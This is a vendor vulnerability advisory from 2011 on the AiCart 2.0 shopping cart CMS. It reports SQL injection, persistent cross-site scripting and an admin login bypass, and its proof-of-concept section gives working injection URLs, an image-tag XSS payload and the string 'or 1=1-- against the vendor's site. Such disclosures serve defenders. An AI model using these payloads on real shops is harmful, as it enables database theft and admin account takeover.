Document Title: =============== AiCart 2.0 CMS - Multiple Critical Web Vulnerabilities Release Date: ============= 2011-06-21 Vulnerability Laboratory ID (VL-ID): ==================================== 203 Product & Service Introduction: =============================== AiCart shopping cart software is created in PHP and uses a simple template structure, makes it very flexible and easy to modify. The data in AiCart is stored in a MySQL database.AiCart is fully W3C-compliant with a CSS-based layout. AiCart features a built-in Content Management System giving you the abity to easily manage and create unlimited web site pages with an easy to use online text editor. Best of all AiCart is search engine friendly. A merchant can specify meta tags for all pages and product and category pages are all stored using the relevent meta data which result in higher search engine rankings. AiWood Digital also offers custom programming services. Every client can get a storefront with a unique look fully customized to completely fit the style, image and structure of your business. AiCart is full compatable with PayPal and also features its own store merchant (credit card processing requires an SSL certificate for maximum security) as well as having the option to processoffline payments. (Copy of the Vendor Homepage: http://www.aicart.ca/home) Abstract Advisory Information: ============================== Vulnerability-Lab Team discovered multiple SQL Injection & Cross Site Scripting Vulnerabilities on AiCart CMS v2.0. Vulnerability Disclosure Timeline: ================================== 2011-06-20: Public or Non-Public Disclosure Discovery Status: ================= Published Affected Product(s): ==================== Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ 1.1 Multiple SQL Injection Vulnerabilities are detected on the new AiCart Shopping CMS v2.0. The vulnerability allows remote attacker (pre-auth) to inject own sql statements on the application dbms. Vulnerable Module(s): [+] Add to Cart (Shop) [+] Sortby [+] TYPE_ID [+] ID --- SQL Error Logs --- SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near Limit 24, 24 at line 4 SQL Data: SELECT * from products WHERE bid = 2 AND status = 1 ORDER BY -1 Limit 24, 24 File: /home/aicart/public_html/v3/includes/class.sql_db.php Line: 50 SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near order by 1--, NOW()) at line 1 SQL Data: INSERT into basket (cartid, uid, pid, quantity, date) values (5669fc809f48dff557fb50bee3ab472d-1308462112, 2, 2, order by 1--, NOW()) File: /home/aicart/public_html/v3/includes/class.sql_db.php Line: 43 SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1 SQL Data: SELECT * from product_brands WHERE lname = -1; File: /home/aicart/public_html/v3/includes/class.sql_db.php Line: 50 SQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near , NOW()) at line 1 SQL Data: INSERT into basket (cartid, pid, quantity, date) values (38314720c60f05f218b581bad46caed0-1308461139, 2, -1, NOW()) File: /home/aicart/public_html/v3/includes/class.sql_db.php Line: 43 1.2 A persistent Input Validation Vulnerability is detected on the ajax module on the pager param request. The vulnerability allows an remote attacker to implemente malicious persistent script code on application-side. The successfully exploitation of the bug allows an attacker to hijack the admin/customer sessions(accounts) or can lead to contest request manipulation. Vulnerable Module(s): [+] Ajax - Pager [+] Credit Name [+] Rating [+] Search 1.3 An Auth Bypass Vulnerability is detected on the admin login form of the AiCart Admin Interface. The bug allows an atttacker to bypass the auth to the admin panel. Pictures: ../1.png ../1.jpg ../2.jpg ../3.jpg ../4.jpg ../5.jpg ../6.jpg Proof of Concept (PoC): ======================= The vulnerabilities can be exploited by remote attackers. For demonstration or reproduce ... 1.1 SQL Reference: http://www.aicart.ca/templates/ajax/pager.php?type=brands&page=1&sortby=-1%27&where_id=&type_id=Nikon http://www.aicart.ca/templates/ajax/pager.php?type=brands&page=0&sortby=&where_id=&type_id=-1%27 http://www.aicart.ca/store?action=orders&id=-3+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 1.2 XSS Reference: http://www.aicart.ca/templates/ajax/pager.php?type=reviews&page=0&sortby=&where_id=pid%20=%202&pager_id= http://www.aicart.ca/search?searchstring=%22%3E%3Cimg%20src=%22http://gallery.7bna.com/data/media/50/injection.jpg%22%3E&x=0&y=0 1.3 Auth Bypass: http://www.aicart.ca/v3/admin/SQL%20Error:%20You%20have%20an%20error%20in%20your%20SQL%20syntax;%20check%20the%20manual%20that%20corresponds%20to%20your%20MySQL%20server%20version%20for%20the%20right%20syntax%20to%20use%20near%20'8ce3f2de6a1e527b7e2b0c81807743e9''%20at%20line%201%3Cbr%20/%3ESQL%20Data:%20SELECT%20*%20from%20users_admin%20where%20email%20=%20''%20or%201=1--'%20AND%20password%20=%20'8ce3f2de6a1e527b7e2b0c81807743e9'%3Cbr%20/%3EFile:%20/home/aicart/public_html/v3/includes/class.sql_db.php%3Cbr%20/%3ELine:%20500/admin String: 'or 1=1-- Security Risk: ============== 1.1 The security risk of the multiple sql injection vulnerabilities are estimated as critical. 1.2 The security risk of the multiple cross site scripting vulnerabilities are estimated as medium. 1.3 The security risk of the auth bypass vulnerability is estimated as critical. Credits & Authors: ================== Vulnerability Research Laboratory Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory